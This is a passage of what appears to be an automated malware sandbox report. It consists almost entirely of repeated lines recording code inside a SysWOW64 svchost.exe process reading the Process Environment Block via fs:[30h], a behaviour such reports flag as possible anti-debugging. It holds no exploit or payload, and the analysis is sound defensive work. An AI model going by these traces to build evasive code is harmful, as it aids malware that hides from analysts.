                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364B1B0 mov eax, dword ptr fs:[00000030h]1_2_0364B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03670185 mov eax, dword ptr fs:[00000030h]1_2_03670185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EC188 mov eax, dword ptr fs:[00000030h]1_2_036EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EC188 mov eax, dword ptr fs:[00000030h]1_2_036EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]1_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]1_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]1_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]1_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A197 mov eax, dword ptr fs:[00000030h]1_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A197 mov eax, dword ptr fs:[00000030h]1_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A197 mov eax, dword ptr fs:[00000030h]1_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03687190 mov eax, dword ptr fs:[00000030h]1_2_03687190
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B106E mov eax, dword ptr fs:[00000030h]1_2_036B106E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03705060 mov eax, dword ptr fs:[00000030h]1_2_03705060
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]1_2_03641070
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03641070 mov ecx, dword ptr fs:[00000030h]1_2_03641070
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]1_2_03641070
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]1_2_03641070
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]1_2_03641070
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]1_2_03641070
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]1_2_03641070
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]1_2_03641070
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]1_2_03641070
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]1_2_03641070
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]1_2_03641070
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]1_2_03641070
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]1_2_03641070
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365C073 mov eax, dword ptr fs:[00000030h]1_2_0365C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AD070 mov ecx, dword ptr fs:[00000030h]1_2_036AD070
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03632050 mov eax, dword ptr fs:[00000030h]1_2_03632050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D705E mov ebx, dword ptr fs:[00000030h]1_2_036D705E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D705E mov eax, dword ptr fs:[00000030h]1_2_036D705E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365B052 mov eax, dword ptr fs:[00000030h]1_2_0365B052
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6050 mov eax, dword ptr fs:[00000030h]1_2_036B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A020 mov eax, dword ptr fs:[00000030h]1_2_0362A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C020 mov eax, dword ptr fs:[00000030h]1_2_0362C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F903E mov eax, dword ptr fs:[00000030h]1_2_036F903E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F903E mov eax, dword ptr fs:[00000030h]1_2_036F903E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F903E mov eax, dword ptr fs:[00000030h]1_2_036F903E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F903E mov eax, dword ptr fs:[00000030h]1_2_036F903E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B4000 mov ecx, dword ptr fs:[00000030h]1_2_036B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]1_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]1_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]1_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]1_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036550E4 mov eax, dword ptr fs:[00000030h]1_2_036550E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036550E4 mov ecx, dword ptr fs:[00000030h]1_2_036550E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0362A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036380E9 mov eax, dword ptr fs:[00000030h]1_2_036380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B60E0 mov eax, dword ptr fs:[00000030h]1_2_036B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C0F0 mov eax, dword ptr fs:[00000030h]1_2_0362C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036720F0 mov ecx, dword ptr fs:[00000030h]1_2_036720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]1_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036470C0 mov ecx, dword ptr fs:[00000030h]1_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036470C0 mov ecx, dword ptr fs:[00000030h]1_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]1_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036470C0 mov ecx, dword ptr fs:[00000030h]1_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036470C0 mov ecx, dword ptr fs:[00000030h]1_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]1_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]1_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]1_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]1_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]1_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]1_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]1_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]1_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]1_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]1_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]1_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]1_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037050D9 mov eax, dword ptr fs:[00000030h]1_2_037050D9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AD0C0 mov eax, dword ptr fs:[00000030h]1_2_036AD0C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AD0C0 mov eax, dword ptr fs:[00000030h]1_2_036AD0C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B20DE mov eax, dword ptr fs:[00000030h]1_2_036B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036590DB mov eax, dword ptr fs:[00000030h]1_2_036590DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C80A8 mov eax, dword ptr fs:[00000030h]1_2_036C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F60B8 mov eax, dword ptr fs:[00000030h]1_2_036F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F60B8 mov ecx, dword ptr fs:[00000030h]1_2_036F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363208A mov eax, dword ptr fs:[00000030h]1_2_0363208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362D08D mov eax, dword ptr fs:[00000030h]1_2_0362D08D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03635096 mov eax, dword ptr fs:[00000030h]1_2_03635096
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365D090 mov eax, dword ptr fs:[00000030h]1_2_0365D090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365D090 mov eax, dword ptr fs:[00000030h]1_2_0365D090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366909C mov eax, dword ptr fs:[00000030h]1_2_0366909C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362B765 mov eax, dword ptr fs:[00000030h]1_2_0362B765
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362B765 mov eax, dword ptr fs:[00000030h]1_2_0362B765
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362B765 mov eax, dword ptr fs:[00000030h]1_2_0362B765
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362B765 mov eax, dword ptr fs:[00000030h]1_2_0362B765
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638770 mov eax, dword ptr fs:[00000030h]1_2_03638770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03643740 mov eax, dword ptr fs:[00000030h]1_2_03643740
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03643740 mov eax, dword ptr fs:[00000030h]1_2_03643740
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03643740 mov eax, dword ptr fs:[00000030h]1_2_03643740
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366674D mov esi, dword ptr fs:[00000030h]1_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366674D mov eax, dword ptr fs:[00000030h]1_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366674D mov eax, dword ptr fs:[00000030h]1_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630750 mov eax, dword ptr fs:[00000030h]1_2_03630750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672750 mov eax, dword ptr fs:[00000030h]1_2_03672750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672750 mov eax, dword ptr fs:[00000030h]1_2_03672750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03703749 mov eax, dword ptr fs:[00000030h]1_2_03703749
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B4755 mov eax, dword ptr fs:[00000030h]1_2_036B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EF72E mov eax, dword ptr fs:[00000030h]1_2_036EF72E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03633720 mov eax, dword ptr fs:[00000030h]1_2_03633720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364F720 mov eax, dword ptr fs:[00000030h]1_2_0364F720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364F720 mov eax, dword ptr fs:[00000030h]1_2_0364F720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364F720 mov eax, dword ptr fs:[00000030h]1_2_0364F720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F972B mov eax, dword ptr fs:[00000030h]1_2_036F972B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C720 mov eax, dword ptr fs:[00000030h]1_2_0366C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C720 mov eax, dword ptr fs:[00000030h]1_2_0366C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370B73C mov eax, dword ptr fs:[00000030h]1_2_0370B73C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370B73C mov eax, dword ptr fs:[00000030h]1_2_0370B73C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370B73C mov eax, dword ptr fs:[00000030h]1_2_0370B73C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370B73C mov eax, dword ptr fs:[00000030h]1_2_0370B73C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03629730 mov eax, dword ptr fs:[00000030h]1_2_03629730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03629730 mov eax, dword ptr fs:[00000030h]1_2_03629730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03665734 mov eax, dword ptr fs:[00000030h]1_2_03665734
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363973A mov eax, dword ptr fs:[00000030h]1_2_0363973A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363973A mov eax, dword ptr fs:[00000030h]1_2_0363973A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366273C mov eax, dword ptr fs:[00000030h]1_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366273C mov ecx, dword ptr fs:[00000030h]1_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366273C mov eax, dword ptr fs:[00000030h]1_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AC730 mov eax, dword ptr fs:[00000030h]1_2_036AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03637703 mov eax, dword ptr fs:[00000030h]1_2_03637703
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03635702 mov eax, dword ptr fs:[00000030h]1_2_03635702
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03635702 mov eax, dword ptr fs:[00000030h]1_2_03635702
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C700 mov eax, dword ptr fs:[00000030h]1_2_0366C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630710 mov eax, dword ptr fs:[00000030h]1_2_03630710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03660710 mov eax, dword ptr fs:[00000030h]1_2_03660710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366F71F mov eax, dword ptr fs:[00000030h]1_2_0366F71F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366F71F mov eax, dword ptr fs:[00000030h]1_2_0366F71F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363D7E0 mov ecx, dword ptr fs:[00000030h]1_2_0363D7E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036527ED mov eax, dword ptr fs:[00000030h]1_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036527ED mov eax, dword ptr fs:[00000030h]1_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036527ED mov eax, dword ptr fs:[00000030h]1_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036347FB mov eax, dword ptr fs:[00000030h]1_2_036347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036347FB mov eax, dword ptr fs:[00000030h]1_2_036347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363C7C0 mov eax, dword ptr fs:[00000030h]1_2_0363C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036357C0 mov eax, dword ptr fs:[00000030h]1_2_036357C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036357C0 mov eax, dword ptr fs:[00000030h]1_2_036357C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036357C0 mov eax, dword ptr fs:[00000030h]1_2_036357C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B07C3 mov eax, dword ptr fs:[00000030h]1_2_036B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B97A9 mov eax, dword ptr fs:[00000030h]1_2_036B97A9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BF7AF mov eax, dword ptr fs:[00000030h]1_2_036BF7AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BF7AF mov eax, dword ptr fs:[00000030h]1_2_036BF7AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BF7AF mov eax, dword ptr fs:[00000030h]1_2_036BF7AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BF7AF mov eax, dword ptr fs:[00000030h]1_2_036BF7AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BF7AF mov eax, dword ptr fs:[00000030h]1_2_036BF7AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037037B6 mov eax, dword ptr fs:[00000030h]1_2_037037B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036307AF mov eax, dword ptr fs:[00000030h]1_2_036307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365D7B0 mov eax, dword ptr fs:[00000030h]1_2_0365D7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F7BA mov eax, dword ptr fs:[00000030h]1_2_0362F7BA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F7BA mov eax, dword ptr fs:[00000030h]1_2_0362F7BA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F7BA mov eax, dword ptr fs:[00000030h]1_2_0362F7BA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F7BA mov eax, dword ptr fs:[00000030h]1_2_0362F7BA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F7BA mov eax, dword ptr fs:[00000030h]1_2_0362F7BA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F7BA mov eax, dword ptr fs:[00000030h]1_2_0362F7BA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F7BA mov eax, dword ptr fs:[00000030h]1_2_0362F7BA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F7BA mov eax, dword ptr fs:[00000030h]1_2_0362F7BA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F7BA mov eax, dword ptr fs:[00000030h]1_2_0362F7BA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EF78A mov eax, dword ptr fs:[00000030h]1_2_036EF78A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F866E mov eax, dword ptr fs:[00000030h]1_2_036F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F866E mov eax, dword ptr fs:[00000030h]1_2_036F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A660 mov eax, dword ptr fs:[00000030h]1_2_0366A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A660 mov eax, dword ptr fs:[00000030h]1_2_0366A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03669660 mov eax, dword ptr fs:[00000030h]1_2_03669660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03669660 mov eax, dword ptr fs:[00000030h]1_2_03669660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03662674 mov eax, dword ptr fs:[00000030h]1_2_03662674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364C640 mov eax, dword ptr fs:[00000030h]1_2_0364C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E627 mov eax, dword ptr fs:[00000030h]1_2_0364E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F626 mov eax, dword ptr fs:[00000030h]1_2_0362F626
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F626 mov eax, dword ptr fs:[00000030h]1_2_0362F626
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F626 mov eax, dword ptr fs:[00000030h]1_2_0362F626
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F626 mov eax, dword ptr fs:[00000030h]1_2_0362F626
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F626 mov eax, dword ptr fs:[00000030h]1_2_0362F626
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F626 mov eax, dword ptr fs:[00000030h]1_2_0362F626
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F626 mov eax, dword ptr fs:[00000030h]1_2_0362F626
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F626 mov eax, dword ptr fs:[00000030h]1_2_0362F626
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F626 mov eax, dword ptr fs:[00000030h]1_2_0362F626
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03666620 mov eax, dword ptr fs:[00000030h]1_2_03666620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03705636 mov eax, dword ptr fs:[00000030h]1_2_03705636
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03668620 mov eax, dword ptr fs:[00000030h]1_2_03668620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363262C mov eax, dword ptr fs:[00000030h]1_2_0363262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03661607 mov eax, dword ptr fs:[00000030h]1_2_03661607
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE609 mov eax, dword ptr fs:[00000030h]1_2_036AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366F603 mov eax, dword ptr fs:[00000030h]1_2_0366F603
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03633616 mov eax, dword ptr fs:[00000030h]1_2_03633616
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03633616 mov eax, dword ptr fs:[00000030h]1_2_03633616
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672619 mov eax, dword ptr fs:[00000030h]1_2_03672619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C36EE mov eax, dword ptr fs:[00000030h]1_2_036C36EE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C36EE mov eax, dword ptr fs:[00000030h]1_2_036C36EE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C36EE mov eax, dword ptr fs:[00000030h]1_2_036C36EE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C36EE mov eax, dword ptr fs:[00000030h]1_2_036C36EE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C36EE mov eax, dword ptr fs:[00000030h]1_2_036C36EE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C36EE mov eax, dword ptr fs:[00000030h]1_2_036C36EE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365D6E0 mov eax, dword ptr fs:[00000030h]1_2_0365D6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365D6E0 mov eax, dword ptr fs:[00000030h]1_2_0365D6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]1_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]1_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]1_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]1_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B06F1 mov eax, dword ptr fs:[00000030h]1_2_036B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B06F1 mov eax, dword ptr fs:[00000030h]1_2_036B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036ED6F0 mov eax, dword ptr fs:[00000030h]1_2_036ED6F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0366A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A6C7 mov eax, dword ptr fs:[00000030h]1_2_0366A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363B6C0 mov eax, dword ptr fs:[00000030h]1_2_0363B6C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363B6C0 mov eax, dword ptr fs:[00000030h]1_2_0363B6C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363B6C0 mov eax, dword ptr fs:[00000030h]1_2_0363B6C0
